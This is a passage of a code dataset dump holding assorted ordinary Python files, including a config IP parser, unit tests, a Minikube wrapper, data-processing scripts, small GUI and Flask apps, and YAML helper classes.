f:\r\n\t\t\tpass\r\n","sub_path":"history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"430463089","text":"#!/usr/bin/env python\n\ndef get_ip_from_cfg(config):\n\n import re\n dict = {}\n with open(config) as cfg:\n rgex = ('(?P<intf>interface \\S+)''| ip ad\\S+ (?P<ip>\\S+) (?P<mask>\\S+)')\n for line in cfg:\n rslt = re.match(rgex, line)\n if rslt:\n if rslt.group('intf'):\n intf = rslt.group('intf')\n ip = mask = ''\n dict[intf] = {}\n else:\n ip = rslt.group('ip')\n mask = 
rslt.group('mask')\n dict[intf] = (ip, mask)\n\n rslt_dict = {}\n for l in dict.items():\n if ('', '') not in l:\n rslt_dict[l[0]] = l[1]\n return rslt_dict\n\nif __name__ == '__main__':\n print(get_ip_from_cfg('config_r1.txt'))\n","sub_path":"15_module_re/answ_task_15_1a_get_ip_from_cfg.py","file_name":"answ_task_15_1a_get_ip_from_cfg.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"207893728","text":"# -*- coding: utf-8 -*-\n\n\"\"\" Test the iotlabcli.parser.common module \"\"\"\n# pylint: disable=too-many-public-methods\n\nimport unittest\nimport sys\ntry:\n # pylint: disable=import-error,no-name-in-module\n from mock import patch, Mock\nexcept ImportError: # pragma: no cover\n # pylint: disable=import-error,no-name-in-module\n from unittest.mock import patch, Mock\nfrom iotlabcli.parser import common\n\n\nclass TestCommonParser(unittest.TestCase):\n \"\"\" Test the iotlab.parser.common module \"\"\"\n\n @patch('iotlabcli.rest.Api._method')\n def test_sites_list(self, _method_get_sited):\n \"\"\" Run get_sites method \"\"\"\n _method_get_sited.return_value = {\n \"items\": [{'site': 'grenoble'}, {'site': 'strasbourg'}]\n }\n\n self.assertEquals(['grenoble', 'strasbourg'], common.sites_list())\n self.assertEquals(['grenoble', 'strasbourg'], common.sites_list())\n self.assertEquals(1, _method_get_sited.call_count)\n\n def test_main_cli(self):\n \"\"\" Run the main-cli function \"\"\"\n function = Mock(return_value='{\"result\": 0}')\n parser = Mock()\n parser.error.side_effect = SystemExit\n\n common.main_cli(function, parser)\n\n function.side_effect = IOError()\n self.assertRaises(SystemExit, common.main_cli, function, parser)\n\n with patch('sys.stderr', sys.stdout):\n function.side_effect = RuntimeError()\n self.assertRaises(SystemExit, common.main_cli, function, parser)\n\n function.side_effect = KeyboardInterrupt()\n self.assertRaises(SystemExit, common.main_cli, function, parser)\n","sub_path":"iotlabcli/tests/common_parser_test.py","file_name":"common_parser_test.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"497971857","text":"#!/usr/bin/env python\n# -*- coding: utf-8\nimport subprocess\nimport time\nfrom urlparse import urljoin\n\nimport os\nimport requests\nimport yaml\nfrom monotonic import monotonic as time_monotonic\n\nPATIENCE = 30\n\n\nclass Minikube(object):\n kubeconfig = None\n server = None\n client_cert = None\n client_key = None\n api_cert = None\n\n def __init__(self, workdir, driver, k8s_version=None, profile=None):\n path = os.path.join(workdir, \"minikube\")\n if not os.path.exists(path):\n raise MinikubeError(\"Minikube is not installed at %s\" % path)\n self._path = path\n self.kubeconfig = os.path.join(workdir, \"kubeconfig\")\n self._env = os.environ.copy()\n self._env[\"KUBECONFIG\"] = self.kubeconfig\n self._driver = driver\n self._k8s_version = k8s_version\n self._profile = profile\n\n def _set_attributes(self):\n def find_named_item(name, l):\n for item in l:\n if item[u\"name\"] == name:\n return item\n raise MinikubeError(\"Unable to find item matching selected name (%s)\" % name)\n\n with open(self.kubeconfig, \"r\") as fobj:\n config = yaml.safe_load(fobj)\n try:\n context = find_named_item(self._profile, config[u\"contexts\"])[u\"context\"]\n cluster = find_named_item(context[u\"cluster\"], config[u\"clusters\"])[u\"cluster\"]\n self.server = 
cluster[u\"server\"]\n self.api_cert = cluster[u\"certificate-authority\"]\n user = find_named_item(context[u\"user\"], config[u\"users\"])[u\"user\"]\n self.client_cert = user[u\"client-certificate\"]\n self.client_key = user[u\"client-key\"]\n except KeyError as e:\n raise MinikubeError(\"Unable to read configuration for selected context: %s\" % str(e))\n\n def _api_is_up(self):\n try:\n resp = requests.get(urljoin(self.server, \"version\"),\n cert=(self.client_cert, self.client_key),\n verify=self.api_cert,\n timeout=1)\n except requests.RequestException:\n return False\n return resp.status_code == 200\n\n def start(self):\n extra_params = [\"--keep-context\"]\n if self._k8s_version:\n extra_params.extend((\"--kubernetes-version\", self._k8s_version))\n extra_params.extend(self._driver.arguments)\n running = self._attempt_start(extra_params)\n start = time_monotonic()\n while not running and time_monotonic() < (start + PATIENCE):\n running = self._attempt_start(extra_params)\n if not running:\n raise MinikubeError(\"Gave up starting minikube after %d seconds\" % PATIENCE)\n\n def _attempt_start(self, extra_params):\n self._execute(\"start\", extra_params)\n time.sleep(1)\n self._set_attributes()\n running = self._api_is_up()\n return running\n\n def stop(self):\n self._execute(\"stop\")\n\n def delete(self):\n self._execute(\"delete\", ignore_errors=True)\n\n def _execute(self, operation, extra_params=None, ignore_errors=False):\n cmd = [self._path, operation]\n if extra_params:\n cmd.extend(extra_params)\n if self._profile:\n cmd.extend((\"--profile\", self._profile))\n try:\n subprocess.check_output(cmd, stderr=subprocess.STDOUT, env=self._env)\n except subprocess.CalledProcessError as e:\n if not ignore_errors:\n raise MinikubeError(e, output=e.output)\n\n\nclass MinikubeError(Exception):\n def __init__(self, arg, output=\"\"):\n super(MinikubeError, self).__init__(arg)\n self._output = output\n\n def __str__(self):\n desc = super(MinikubeError, self).__str__()\n if self._output:\n return \"\\n\".join((desc, \"Output from command:\", self._output))\n return desc\n","sub_path":"minikube/minikube.py","file_name":"minikube.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"222165365","text":"import numpy as np\n\n# input data shape should be: (5,4,6,n)\n# return data shape is: (5,4,6,n)\ndef help():\n print('''\n Usage:\n >> import sida.cs228.standardize as std\n >> std.do(data)\n\n The shape of the argument `data` should be: (5,4,6,n), where n can be any integer.\n The meaning of the shape is: 5 fingers, 4 bones, 6 coordinates, n hands.\n The result of `do` function will satisfy those conditions:\n (1) the base of index finger on the origin, \n (2) the tip of the metacarpal bone of the index finger will on the point (0,1,0),\n (3) the tip of the metacarpal bone of the baby finger will also on the x-y plane,\n (4) the tip of the metacarpal bone of the thumb will be on the +z side.\n ''')\n \ndef do(data):\n if len(data.shape)==3:\n data = data.reshape(5,4,6,1)\n \n # input shape (5,4,6) \n # output shape (3,5,4,2)\n def data_to_hand(data, inv=False):\n if not inv:\n assert( data.shape[0] == 5 and data.shape[1] == 4 and data.shape[2] == 6 )\n data = data.reshape(5,4,2,3)\n data = np.moveaxis(data, 3, 0)\n return data\n else:\n assert( data.shape[0] == 3 and data.shape[1] == 5 and data.shape[2] == 4 and data.shape[3] == 2 )\n data = np.moveaxis(data, 0, 3)\n data = data.reshape(5,4,6)\n 
return data\n\n def get_key_points(data):\n # index finger, metacarpal(palm), base\n finger = 1; bone = 0; is_tip = 0\n point1 = hand[:, finger, bone, is_tip]\n # index finger, metacarpal(palm), tip\n finger = 1; bone = 0; is_tip = 1\n point2 = hand[:, finger, bone, is_tip]\n # baby finger, metacarpal(palm), tip\n finger = 4; bone = 0; is_tip = 1\n point3 = hand[:, finger, bone, is_tip]\n # thumb, metacarpal, tip\n finger = 0; bone = 0; is_tip = 1\n point4 = hand[:, finger, bone, is_tip]\n\n return np.array([point1, point2, point3, point4]).T\n\n def ab(a, b):\n n = np.linalg.norm([a,b])\n #print(a,b)\n if n==0:\n print(\"Error: divide by zero.\")\n #print(np.sum(data[:,:,:]))\n #show.show_hand(data[:,:,:])\n #exit()\n a = a / n\n b = b / n\n return a, b\n\n ret = []\n for index in range(data.shape[-1]):\n hand = data_to_hand(data[:,:,:,index]) #So we have points of a hand, the shape is (3,5,4,2), x-y-z 3 coordinates and 5 fingers each hand, 4 bones each finger, 2 ends of each bone, in total 40 points.\n p1 = get_key_points(hand) # So this is 4 points we want to use to standardize. Those key points should relatively stable, such as the metacarpal bones, which we cannot move them a lot even if we want to. The shape is (3,4), x-y-z 3 coordinates and 4 points.\n # Step 1. Move index finger metacarpal(palm) bone base to origin\n for i in range(3): # move x,y,z axes seperately in this loop\n hand[i,:] = hand[i,:] - p1[i,0]\n\n p1 = get_key_points(hand) # We need to know where those key points after last step.\n\n # Step 3. Rotate index finger metacarpal(palm) bone to +x-y plane\n y,z = ab(p1[1,1], p1[2,1]) # p1[1,1] is the y coordinate and p1[2,1] is the z coordinate, we want to rotate to let them fall into +x-y plane, but we need to normalize them, so no scaling will be introduced in this step. here ab(y1,z1) = y1/norm, z1/norm.\n T_rotate = np.array([\n [ 1, 0, 0],\n [ 0, y, z],\n [ 0,-z, y]\n ])\n hand = np.matmul(T_rotate, hand.reshape(3,-1)).reshape(3,5,4,2)\n p1 = get_key_points(hand)\n\n # Step 4. Rotate index finger metacarpal(palm) bone to +y axis\n x,y = ab(p1[0,1], p1[1,1])\n T_rotate = np.array([\n [y, -x, 0],\n [x, y, 0],\n [0, 0, 1]\n ])\n hand = np.matmul(T_rotate, hand.reshape(3,-1)).reshape(3,5,4,2)\n p1 = get_key_points(hand)\n\n # Step 5. Keep index finger on +y axis, Rotate another bone (baby finger, metacarpal(palm), tip) to +x-y plane\n x,z = ab(p1[0,2], p1[2,2])\n T_rotate = np.array([\n [x, 0, z],\n [0, 1, 0],\n [-z, 0, x]\n ])\n hand = np.matmul(T_rotate, hand.reshape(3,-1)).reshape(3,5,4,2)\n p1 = get_key_points(hand)\n\n # Step 6. Mirror Adjust Left-Right hand, depending on the z value of 4-th point thumb, metacarpal, tip\n if p1[2,3]<0:\n #print(\"mirror\")\n hand[2,:,:,:] = - hand[2,:,:,:]\n\n # Step 7. 
Normalize the scale so the index finger metacarpal(palm) bone has length 1\n hand = hand/np.linalg.norm(p1[:,1]-p1[:,0]) # length of the index metacarpal: distance between key points 1 and 2\n #print(hand.shape)\n #p1 = get_key_points(hand)\n\n #print(p1)\n ret.append(data_to_hand(hand, inv=True))\n ret = np.array(ret)\n \n data = np.moveaxis(ret, 0, 3)\n return data","sub_path":"sida/cs228/standardize.py","file_name":"standardize.py","file_ext":"py","file_size_in_byte":4892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"626050869","text":"import argparse, fileinput, os\n\n# Script for fixing the wav.scp files\ndef get_args():\n parser = argparse.ArgumentParser(description=\"Replace all wav.scp and wav.scp.bak files with the corrected versions\")\n parser.add_argument(\"--wav-dir\", type=str, required=True,\n help=\"Path to wav directory\")\n args = parser.parse_args()\n return args\n\ndef fix_language(wav_dir, lang):\n files_to_fix = []\n wav_file = os.path.join(wav_dir, lang, \"lists\", \"wav.scp\")\n assert os.path.exists(wav_file), \"No wav file path in {}\".format(wav_file)\n files_to_fix.append(wav_file)\n backup_file = os.path.join(wav_dir, lang, \"lists\", \"wav.scp.bak\")\n if os.path.exists(backup_file):\n files_to_fix.append(backup_file)\n\n for file in files_to_fix:\n with fileinput.FileInput(file, inplace=True) as f:\n for line in f:\n print(line.replace(\"s1513472\", \"s1531206\"), end='')\n\n\ndef main():\n args = get_args()\n wav_dir = args.wav_dir\n\n assert os.path.exists(wav_dir), \"Directory not found in {}\".format(wav_dir)\n os.chdir(wav_dir)\n langs = [ x for x in os.listdir() if len(x) == 2 ]\n print(langs)\n for lang in langs:\n fix_language(wav_dir, lang)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"misc/fix_wav_directory.py","file_name":"fix_wav_directory.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"100664151","text":"import pytest\nfrom pbc.sg.selenium import Grid\n\n\n@pytest.fixture(scope=\"session\")\ndef selenium_precondition():\n grid = Grid()\n grid.download()\n grid.start_hub()\n grid.add_node()\n assert len(grid.send_command('pgrep java')) == 2\n yield grid.client\n grid.close()","sub_path":"pbc/sg/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"359517449","text":"import os\nimport unittest\n\ncash_path = os.path.join(os.getcwd(),'../case')\n\nprint('File path:', os.getcwd())\nprint(\"cash_path:\", cash_path)\n\ndiscover = unittest.defaultTestLoader.discover(cash_path,\n pattern=\"Test_*.py\",\n top_level_dir=None)\n# top_level_dir: the name of the top-level directory; leaving it at the default of None is usually fine\n\nif __name__ == '__main__':\n runner = unittest.TextTestRunner()\n runner.run(discover)","sub_path":"com/caibo/main/LoadCase.py","file_name":"LoadCase.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"335904612","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nmain.py\n\nCopyleft (C) 2017 Magnus Lindström <gnusd@telia.com>\n\nThis program is free software: you can redistribute it and/or modify it under\nthe terms of the GNU Affero General Public License as published by the Free\nSoftware Foundation, either version 3 of the License, or (at your option) any\nlater version.\n\nThis program is distributed in the hope that it will be useful, but WITHOUT ANY\nWARRANTY; without 
even the implied warranty of MERCHANTABILITY or FITNESS FOR A\nPARTICULAR PURPOSE. See the GNU Affero General Public License for more details.\n\nYou should have received a copy of the GNU Affero General Public License along\nwith this program. If not, see <http://www.gnu.org/licenses/>.\n\n\"\"\"\n\n# Standard lib\nimport yaml\n\n# Local libs\nfrom log import logging\nimport config.config_db as config_db\nimport database as db\nimport db_manipulation as db_m\nimport data_manipulation as data\nimport w_req\nimport rss_xml\n\n# open the configuration file\nwith open(\"config/config.yaml\", \"r\") as f:\n config = yaml.load(f)\n\n\ndef setup():\n # Creating the tables needed in sqLite\n db.create_table(\"shows\", config_db.shows, config[\"db\"])\n db.create_table(\"songs\", config_db.songs, config[\"db\"])\n\n\ndef init_db():\n # Populating the database for the first time\n # sh_list is a dictionary of all availble show where show number is key and link to page is value\n sh_list = w_req.get_showlist(config[\"url\"])\n # requesting and reading json file from link provieded by sh_list\n w_req.get_json(sh_list, config[\"db\"], config_db.date)\n\n update, new_show, sh_list = data.new_show_list(sh_list, None, new_show=[])\n w_req.get_songlist(new_show, config[\"db\"])\n if config[\"feed_r\"]:\n rss_xml.create_rss_feed(config[\"db\"], True, False)\n if config[\"download_mp3\"]:\n data.download_pod()\n if config[\"feed_l\"]:\n rss_xml.create_rss_feed(config[\"db\"], False, True)\n elif not config[\"download_mp3\"] and not config[\"feed_r\"]:\n rss_xml.create_rss_feed(config[\"db\"], True, False)\n\n\ndef main():\n show = db.select_latest_show(config[\"db\"])\n\n if not show:\n status = db.check_for_tables(config[\"db\"], config[\"ch_table\"])\n logging.debug(status)\n if status:\n init_db()\n else:\n setup()\n init_db()\n\n else:\n sh_list = w_req.get_showlist(config[\"url\"])\n update, new_show, sh_list = data.new_show_list(sh_list, show, config_db.new_show)\n\n logging.debug(\"Update = \" + str(update))\n\n if update:\n w_req.get_json(sh_list, config[\"db\"], config_db.date)\n logging.debug(\"get_json finished.\")\n w_req.get_songlist(new_show, config[\"db\"])\n logging.debug(\"get_songlist finished.\")\n if config[\"feed_r\"]:\n rss_xml.create_rss_feed(config[\"db\"], True, False)\n if config[\"download_mp3\"]:\n data.download_pod()\n if config[\"feed_l\"]:\n rss_xml.create_rss_feed(config[\"db\"], False, True)\n elif not config[\"download_mp3\"] and not config[\"feed_r\"]:\n rss_xml.create_rss_feed(config[\"db\"], True, False)\n\n data.look_for_feeds()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"316041730","text":"print(\"Starting...\")\n\nimport pygame\n\nfrom json import load\nsettings = load(open(\"data/settings.json\"))\n\npygame.init()\nscreen = pygame.display.set_mode((settings[\"resolution\"][\"x\"], settings[\"resolution\"][\"y\"]))\npygame.display.set_caption(\"BaftaYGD\")\n\nclass character:\n def __init__(self, x, y, width, height, velocity):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.velocity = velocity\n\nchar = character(\n x = 100,\n y = 50,\n width = 60,\n height = 60,\n velocity = 5\n)\n\nactive = True\nwhile active:\n pygame.time.delay(10)\n for i in pygame.event.get():\n if i.type == pygame.QUIT:\n active = False\n keys = pygame.key.get_pressed()\n if 
keys[pygame.K_LEFT]:\n char.x -= char.velocity\n if keys[pygame.K_RIGHT]:\n char.x += char.velocity\n if keys[pygame.K_UP]:\n char.y -= char.velocity\n if keys[pygame.K_DOWN]:\n char.y += char.velocity\n pygame.draw.rect(screen, (255, 0, 0), (char.x, char.y, char.width, char.height))\n pygame.display.update()\n\npygame.quit()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"197648167","text":"#!/usr/bin/env python\n\n#ReParseBlastByTerm by Keith Yamada (19.1.2016)\n#Usage ReParseBlastByTerm.py INPUT.txt OUTPUT.txt OUTPUT_terms.txt TERMS(comma separated and lowercase)\n\n# Takes Blast file with columns: query name, accession, subject name, taxonomy, hsp expect\n# Finds TERMS (e.g. predicted, hypothetical) and removes them to a separate file\n\n\nimport sys\n\nIN = open(sys.argv[1],'r')\nOUT = open(sys.argv[2],'w')\nOUT_terms = open(sys.argv[3],'w')\nTERMS = sys.argv[4].split(',')\n\nheader = IN.readline()\nOUT.write(header) # write column names to output file\nOUT_terms.write(header)\n\nlines = IN.readlines()\nfor line in lines:\n col = line.split('\\t')\n count = 0\n for term in TERMS:\n if col[2].find(term) != -1 or col[2].find(term.capitalize()) != -1 or col[2].find(term.upper()) != -1: # if term found\n count += 1 # increase count\n if count == 0: # if no terms found\n OUT.write(line)\n else:\n OUT_terms.write(line)\n\n\nIN.close()\nOUT.close()\nOUT_terms.close()\n","sub_path":"Annotation/blastx2nr/scripts/ReParseBlastByTerm.py","file_name":"ReParseBlastByTerm.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"336180039","text":"# Create a munch object for sci-kit learn\nfrom ingest import *\nfrom munch import *\nimport numpy as np\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn import preprocessing\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\n\n\n##################################################\n#For pulling the data from files (that only contain blobs of text)\n\npath = './data/mini_newsgroups/comp.graphics'\nfiledata = readfiles(path)\ndef fMunch(dict):\n fm = Munch()\n fm.files = dict.keys()\n fm.text = dict.values()\n fm.target = []\n return(fm)\n\n##################################################\n#For pulling the data from a spreadsheet\n\n# de-duplicate titles - this will mean that each abstract is assigned to a\n# pseudo correct working group\n\nsubset = data[['EventID','ED_Track', 'Abstract Text','Title']]\ndedup = subset.drop_duplicates(subset='Title')\ndf = dedup.dropna()\n\n#Encode targets\nle = preprocessing.LabelEncoder()\nle.fit(df['ED_Track'])\ndf = df.assign(target=le.transform(df['ED_Track']))\n\n#def clean(dfcolumn):\n##Split to train and test\ndftrain, dftest = train_test_split(df, test_size = .2)\n\ndef mkMunch(df):\n m = Munch()\n m.titles = list(df['Title'].values)\n m.text = list(df['Abstract Text'].values)\n m.WG = list(df['ED_Track'].values)\n m.target = list(df['target'].values)\n return(m)\n\n#Polished data set for modeling\ndataset = mkMunch(df)\ntrain = mkMunch(dftrain)\ntest = mkMunch(dftest)\n\nlen(dftrain) + len(dftest)\n","sub_path":"wrangle.py","file_name":"wrangle.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"613218587","text":"import 
PySimpleGUI as sg\r\nimport sys\r\nfrom PIL import Image, ImageDraw\r\n\r\nkey_col = {}\r\n\r\n\r\ndef write_checkbox(csv_inp):\r\n col = []\r\n num = []\r\n\r\n for i in range(23):\r\n col.append([])\r\n num.append(0)\r\n \r\n for j in range(23):\r\n for i in range(len(csv_inp.index)):\r\n if csv_inp.values[i, 0] == j - 11:\r\n col[j] += [[sg.Checkbox(csv_inp.values[i, 1], visible=True, key=f'{j - 11}_{num[j]}')]]\r\n key_col[f'{j - 11}_{num[j]}'] = i\r\n num[j] += 1\r\n\r\n return col, num\r\n\r\ndef test(f, v, n, csv_inp):\r\n coord = []\r\n\r\n for i in range(23):\r\n for j in range(n[i]):\r\n if v[f'{i - 11}_{j}'] == True:\r\n coord.append([csv_inp.values[key_col[f'{i - 11}_{j}'], 2],\r\n csv_inp.values[key_col[f'{i - 11}_{j}'], 3]])\r\n #print(len(coord))\r\n #print('true')\r\n #print(v)\r\n #print(key_col)\r\n \r\n #else:\r\n #print('false')\r\n \r\n try:\r\n base = Image.open(f).convert('RGBA')\r\n rect = Image.new('RGBA', base.size)\r\n draw = ImageDraw.Draw(rect)\r\n\r\n for i in range(len(coord)):\r\n draw.rectangle((coord[i][0], coord[i][1], coord[i][0]+89, coord[i][1]+89), fill=(255,0,0,192))\r\n\r\n base = Image.alpha_composite(base,rect)\r\n base.save('Table/sdvx_18_paint.png')\r\n\r\n sg.popup(' 描画が完了しました', title='成功')\r\n except FileNotFoundError as e:\r\n sg.popup(' 画像ファイルが見つかりません', title='エラー')\r\n #sys.exit(1)\r\n\r\n ","sub_path":"func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"448082428","text":"import turtle\n\ndef dibujarEstrella(t):\n for i in range(5):\n t.forward(100)\n t.left(216)\n\ndef separacion(t):\n t.penup()\n t.forward(350)\n t.right(144)\n t.pendown()\n\nMaki = turtle.Turtle()\nfor i in range(5):\n dibujarEstrella(Maki)\n separacion(Maki)\n","sub_path":"Capitulo 4/EstrellasEnEstrella.py","file_name":"EstrellasEnEstrella.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"152255724","text":"import pandas as pd\nimport numpy as np\n\nfile = pd.read_csv('./saved_models/pred_output/seed60_test/grad_m.csv')\nheader = file.columns\nfile = file.values\nprint(file[:5, :])\nprint(file.shape)\nfile = file.flatten()\nprint(file[:10])\nfile = file.reshape((2, -1))\nprint(file[:, :5])\nprint(file.T)\npd.DataFrame(file.T, columns=header, index=None).\\\n to_csv('./saved_models/pred_output/seed60_test/grad_m.csv', index=False)","sub_path":"chemprop_for_c8/chemprop_revised/testttt.py","file_name":"testttt.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"404327440","text":"# -*- coding: utf-8 -*-\n# ----------------------------------------------------------------------\n# Copyright © 2012, RedJack, LLC.\n# All rights reserved.\n#\n# Please see the COPYING file in this distribution for license details.\n# ----------------------------------------------------------------------\n\n\nfrom __future__ import absolute_import\n\nfrom buzzy.errors import BuzzyError\n\n\nclass Yaml(object):\n def __init__(self, *args, **kw):\n pass\n\n @classmethod\n def type_name(cls):\n return cls.__name__.lower()\n\n @classmethod\n def from_yaml(cls, yaml, root, *args, **kw):\n self = cls(*args, **kw)\n self.load_yaml(yaml, root)\n self.validate()\n return self\n\n def load_yaml(self, yaml, root):\n pass\n\n def validate(self):\n pass\n\n @classmethod\n def to_yaml(cls, 
self):\n raise NotImplementedError\n\n\nclass Fields(Yaml):\n def all_fields(self):\n while hasattr(self, \"from_yaml\"):\n if hasattr(self, \"fields\"):\n for tup in self.fields():\n if isinstance(tup, tuple):\n yield tup\n else:\n yield tup, {}\n self = super(self.__class__, self)\n\n def __init__(self, *args, **kw):\n super(Fields, self).__init__(*args, **kw)\n for field, _ in self.all_fields():\n if not hasattr(self, field):\n setattr(self, field, None)\n\n def load_yaml(self, yaml, root):\n # Use an empty set of YAML content if none was given.\n yaml = yaml or {}\n\n # Extract fields from the YAML content.\n for field, options in self.all_fields():\n # Extract the value from the YAML, if present.\n value = None\n if field in yaml:\n value = yaml[field]\n elif \"default\" in options:\n value = options[\"default\"]\n else:\n raise BuzzyError(\"Expected %s in %s\" % (field, self.type_name()))\n\n # Delegate to a custom class, if requested.\n if \"custom\" in options:\n value = options[\"custom\"].from_yaml(value, root)\n\n # Substitute in value references if the field is marked as\n # templated.\n if \"templated\" in options and value is not None:\n value = value % root\n\n setattr(self, field, value)\n\n @classmethod\n def to_yaml(cls, self):\n yaml = {}\n\n # Append fields into the YAML content.\n for field, options in self.all_fields():\n skip = False\n value = getattr(self, field)\n\n if \"custom\" in options:\n value = options[\"custom\"].to_yaml(value)\n\n if \"default\" in options:\n if value == options[\"default\"]:\n # Skip this field if it has the default value.\n skip = True\n\n if not skip:\n yaml[field] = value\n\n return yaml\n\n\nclass Types(Yaml):\n @classmethod\n def from_yaml(cls, yaml, root):\n if isinstance(yaml, dict):\n try:\n type_name = yaml[\"type\"]\n except KeyError:\n raise BuzzyError(\"Missing \\\"type\\\" in %s\" % cls.type_name())\n\n elif isinstance(yaml, str):\n type_name = yaml\n yaml = {\"type\": type_name}\n\n else:\n raise BuzzyError(\"Expected a string or map for %s\" % cls.type_name())\n\n try:\n type_class = cls.types[type_name]\n except KeyError:\n raise BuzzyError(\"Don't know how to process a %s %s\" %\n (type_name, cls.type_name()))\n\n return type_class.from_yaml(yaml, root)\n\n @classmethod\n def to_yaml(cls, self):\n type_class = cls.types[self.type]\n yaml = type_class.to_yaml(self)\n if \"type\" not in yaml:\n raise BuzzyError(\"Missing \\\"type\\\" in %s\" % cls.type_name())\n\n if len(yaml) == 1:\n # If there's only a \"type\" field, render the object as a string\n # instead of a map.\n return yaml[\"type\"]\n else:\n return yaml\n\n\nclass Sequence(Yaml):\n @classmethod\n def from_yaml(cls, yaml, root):\n if isinstance(yaml, list):\n return list(map(lambda x: cls.element_class.from_yaml(x, root), yaml))\n else:\n raise BuzzyError(\"Expected a list for %s\" % cls.type_name())\n\n @classmethod\n def to_yaml(cls, self):\n return map(lambda x: cls.element_class.to_yaml(x), self);\n","sub_path":"buzzy/yaml.py","file_name":"yaml.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"438446148","text":"\"\"\"\nПодключить библиотеку ipaddress\n\nНаписать функцию-классификатор, которая на вход принимает произвольную строку и возвращает словарь:\n- {\"ip\":IPv4Interface()} — для строк вида \" ip address x.x.x.x x.x.x.x\"\n- {“int”:str} — для строк вида \"interface name\"\n- {\"host\":str} — для строк вида \"hostname xxx\"\n- пустой словарь — во всех 
остальных случаях\n\nАналогично предыдущей работе открыть последовательно каждый конфигурационный файл, прочитать его построчно\n\nКлассифицировать каждую прочитанную строку\n\nСоздать три списка: все IP-адреса, все имена интерфейсов, все имена хостов, вывести на экран\n\n2.2\nСоздайте веб-сервер, который делает следующее:\nПри обращении по “/” — выдаёт краткую справку об использовании\nПри обращении по “/configs” — выдаёт сведения об именах всех хостов, для которых есть кофигурационные файлы (см. работу 1.6)\nПри обращении по “/config/hostname” выдает сведения о всех IP-адресах этого хоста\n\"\"\"\n\nimport re\nimport glob\nfrom flask import Flask, jsonify\n\napp = Flask(__name__)\n\n@app.route('/')\ndef help():\n return \"справка\"\n\n@app.route('/configs')\ndef func_host():\n return jsonify(host_list)\n\n@app.route('/config/<hostname>')\ndef func_ip(hostname):\n for k,v in host_ip.items():\n if k == hostname:\n return jsonify(v)\n\n\nif __name__ == '__main__':\n host_list = []\n host_ip = {}\n for file in glob.glob('d:\\OneDrive\\Docs\\Python_cource\\config_files\\*'):\n ip_list = []\n with open(file) as f:\n for line in f:\n host_name = re.match('hostname ([a-zA-Z0-9-]+)', line)\n ip_mask = re.search('(?<=ip address )(([0-9]{1,3}[.]){3}[0-9]{1,3})',line)\n if host_name:\n host_list.append(host_name.group(1))\n host_temp = host_name.group(1)\n if ip_mask:\n ip_list.append(ip_mask.group(0))\n host_ip[host_temp] = ip_list\n app.run(debug=True)\n\n\n\n\n\n","sub_path":"Lab2.2/web_server.py","file_name":"web_server.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"387947652","text":"from os import listdir\n\nDIR = \"openssl/\"\n\nfor f in listdir(DIR):\n with open(DIR + f) as fp:\n od = fp.read()\n\n nd = \"\"\n for line in od.splitlines(True):\n if \"include <openssl/\" in line:\n tl = line.split(\"include\")[-1].split(\"/\")[-1][:-2]\n line = '#include \"' + tl + '\"\\n'\n nd += line\n\n with open(DIR + f, \"w\") as fp:\n fp.write(nd)\n","sub_path":"include/fix_openssl.py","file_name":"fix_openssl.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"326464090","text":"\"\"\"Example of python module statemachine: https://pypi.org/project/python-statemachine/\"\"\"\r\n\r\n# log:set INFO jsr223.jython.thermostate_mode\r\n# minimum version python-statemachine = 1.0.3\r\n\r\nimport sys\r\nimport os\r\n\r\nfrom core.log import logging, LOG_PREFIX\r\nfrom core.rules import rule\r\nfrom core.triggers import when\r\n\r\nOH_CONF = 